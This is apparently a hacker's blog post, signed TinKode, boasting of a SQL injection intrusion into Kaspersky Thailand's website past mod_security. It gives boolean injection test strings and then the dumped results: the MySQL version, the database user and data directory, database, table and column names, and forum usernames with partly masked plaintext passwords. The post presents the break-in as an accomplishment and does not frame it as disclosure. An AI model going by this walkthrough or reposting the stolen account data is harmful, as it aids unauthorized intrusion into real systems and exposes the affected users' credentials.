Kaspersky Thailand Full Access

 _  __                             _                                _
| |/ /                            | |              /\              (_)
| ' / __ _ ___ _ __   ___ _ __ ___| | ___   _     /  \   __ _  __ _ _ _ __
|  < / _` / __| '_ \ / _ \ '__/ __| |/ / | | |   / /\ \ / _` |/ _` | | '_ \
| . \ (_| \__ \ |_) |  __/ |  \__ \   <| |_| |  / ____ \ (_| | (_| | | | | |
|_|\_\__,_|___/ .__/ \___|_|  |___/_|\_\\__, | /_/    \_\__, |\__,_|_|_| |_|
              | |                        __/ |           __/ |
              |_|                       |___/           |___/

                     #Kaspersky Thailand full access@c0de.breaker

Ok… As you might remember, some time ago, I gained access into Kaspersky Portugal.
Now I found another vulnerable parameter in Kaspersky Thailand.
Because the mod_security was ON, it was hard for me to make the injection, and in order to extract tables,colums,etc you must have a vast knowledge about how to filter some things.

Testing:

and 1=1– (False)

and 1=2– (True)

Main Informations:

#Version: 5.1.30
#User:thaikasp_forum@localhost
#Principal Database:thaikasp_dealer
#Datadir:/var/lib/mysql/

All databases:

#information_schema
#thaikasp_dealer
#thaikasp_forum

Tables from thaikasp_dealer:

#bkkplace
#newheader
#tb_dealer
#tb_part

Tables from thaikasp_forum:

#forum
#tbmember

Columns from tbmember

#ID
#Username
#Password

And now all accounts from tbmember. I can’t understand why passwords aren’t encrypted!

#tomsound:b_v***
#anukool:kas*****
#kaspersky2009:w***
#gm8kaspe*****

Admin Control Panel:

Yeah, finish.
Bye, TinKode

Advertisements

One thought on “Kaspersky Thailand Full Access

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s